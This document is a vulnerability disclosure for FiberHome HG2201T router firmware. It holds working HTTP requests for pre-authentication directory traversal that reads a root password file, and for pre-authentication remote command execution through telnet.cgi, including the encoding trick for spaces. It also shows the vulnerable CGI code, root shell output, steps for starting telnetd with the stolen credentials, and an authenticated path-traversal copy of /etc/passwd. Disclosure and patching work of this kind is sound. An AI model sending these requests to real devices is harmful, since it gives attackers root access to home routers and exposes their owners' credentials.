POST /cgi-bin/downloadfile.cgi HTTP/1.1
Host: 192.168.1.1:8080
Connection: close
Content-Length: 24
downpath=/var/tel_passwd
Then download from
http://192.168.1.1:8080/download.tar
root:<plaintext password>:0:0:root:/:/bin/sh
tianyi:<plaintext password>:0:0:root:/:/bin/sh
Vuln code: /var/WEB-GUI/cgi-bin/downloadfile.cgi
setdownloadfile()
{
LINE=`./getpostdata.cgi $CONTENT_LENGTH`
[ "x$LINE" == "x" ] && READERR=1
[ "x$LINE" != "x" ] && LINE=`./urldecode.cgi $LINE`
paramIndex="1"
CGIParam=`echo "$LINE&" | cut -d '&' -f $paramIndex`
while [ "$CGIParam" != "" ]
do
par=`echo "$CGIParam" | cut -d '=' -f 1`
val=`echo "$CGIParam" | cut -d '=' -f 2`
if [ "$val" != "" ]; then
case $par
in
"downpath")
DOWNPATH=$val
;;
esac
fi
paramIndex=$((paramIndex+1))
CGIParam=`echo "$LINE&" | cut -d '&' -f $paramIndex`
is_submit="1"
done
if [ "$is_submit" == "1" ]; then
tar -cvf /var/WEB-GUI/download.tar $DOWNPATH >/dev/null 2>&1
fi
}
Description
FiberHome HG2201T 1.00.M5007_JS_201804 devices allows pre-authentication Directory Traversal for reading arbitrary files.
Vulnerability Type
Incorrect Access Control/Directory Traversal
Vendor of Product
Fiberhome
Affected Product Code Base
HG2201T - HG2201T_1.00.M5007_JS_201804
Affected Component
/var/WEB-GUI/cgi-bin/downloadfile.cgi
Attack Type
Remote
POST /cgi-bin/telnet.cgi HTTP/1.1
Host: 192.168.1.1:8080
Connection: close
Content-Length: 38
InputCmd=ping%25231.1.1.1%2523-c%25233
/var/WEB-GUI # cat telnet_output.log
cat telnet_output.log
PING 1.1.1.1 (1.1.1.1): 56 data bytes
64 bytes from 1.1.1.1: seq=0 ttl=55 time=176.370 ms
64 bytes from 1.1.1.1: seq=1 ttl=55 time=177.170 ms
64 bytes from 1.1.1.1: seq=2 ttl=55 time=175.522 ms
--- 1.1.1.1 ping statistics ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 175.522/176.354/177.170 ms
Vuln code: /var/WEB-GUI/cgi-bin/telnet.cgi (Notice urldecode and sed in query string processing, space needs to be submitted as %2523. To get shell, simply run telnetd and login with credentials read from /var/tel_passwd and/or telWan_passwd on port 23 via telnet)
settelnet()
{
QUERY_STRING=`./getpostdata.cgi $CONTENT_LENGTH`
[ "x$QUERY_STRING" == "x" ] && READERR=1
[ "x$QUERY_STRING" != "x" ] && QUERY_STRING=`./urldecode.cgi $QUERY_STRING`
paramIndex="1"
CGIParam=`echo "$QUERY_STRING&" | cut -d '&' -f $paramIndex`
while [ "$CGIParam" != "" ]
do
par=`echo "$CGIParam" | cut -d '=' -f 1`
val=`echo "$CGIParam" | cut -d '=' -f 2`
if [ "$val" != "" ]; then
case $par
in
"InputCmd")
INPUTCMD=$val
INPUTCMD=`echo "$INPUTCMD" | sed 's/%23/ /g'`
;;
esac
fi
paramIndex=$((paramIndex+1))
CGIParam=`echo "$QUERY_STRING&" | cut -d '&' -f $paramIndex`
is_submit="1"
done
if [ "$is_submit" == "1" ]; then
rm /var/WEB-GUI/telnet_* >/dev/null 2>&1
echo "${INPUTCMD}" >/var/WEB-GUI/telnet_input.log
echo "${INPUTCMD}" >/var/WEB-GUI/telnet_input.sh
chmod +x /var/WEB-GUI/telnet_input.sh
cd /var/WEB-GUI/
./telnet_input.sh >/var/WEB-GUI/telnet_output.log 2>&1
fi
echo "
{\"RETURN\":
{\"success\": true}
}"
}
telnet sh shell
/var # id
id
uid=0(root) gid=0(root) groups=0(root)
/var # uname -a
uname -a
Linux localhost 3.18.21+ #6 SMP Fri Sep 7 19:28:01 CST 2018 mips GNU/Linux
Description
FiberHome HG2201T 1.00.M5007_JS_201804 devices allows pre-authentication remote code execution.
Vulnerability Type
Incorrect Access Control
Vendor of Product
Fiberhome
Affected Product Code Base
HG2201T - HG2201T_1.00.M5007_JS_201804
Affected Component
/var/WEB-GUI/cgi-bin/telnet.cgi
Attack Type
Remote
HG2201T runs http server on both 80 and 8080 with firmware version HG2201T_1.00.M5007_JS_201804
An auth-ed user is able to manage files on flash driver (if pluged-in) using web interface by design.
However, this file manager can be invoked without the existence of flash driver as well as easily path traversed (this can be a CVE as well), then we get an arbitrary file read after this, by copying /some/thing to /mnt/usb_x/somewhere while httpd runs on root priv.
A 'copy to' query looks alike
POST /cgi-bin/luci/admin/storage/copyMove HTTP/1.1
Host: 192.168.1.1
Cookie: sysauth=<fixed upon login>
Connection: close
token=<fixed upon login>&opstr=copy%7C%2Fetc%2F%7C%2Fvar%2FWEB-GUI%2F%7Cpasswd&fileLists=passwd%2F&_=0.1327969112555747
Key query string
opstr=copy|/etc/|/var/WEB-GUI/|passwd&fileLists=passwd
By reviewing a bit cgi files served on 8080, we get pre-auth RCE. Both vuln code pieces were hidden in cgi-bin folder, no served front-end.
Credit: PF7@Chaitin Tech.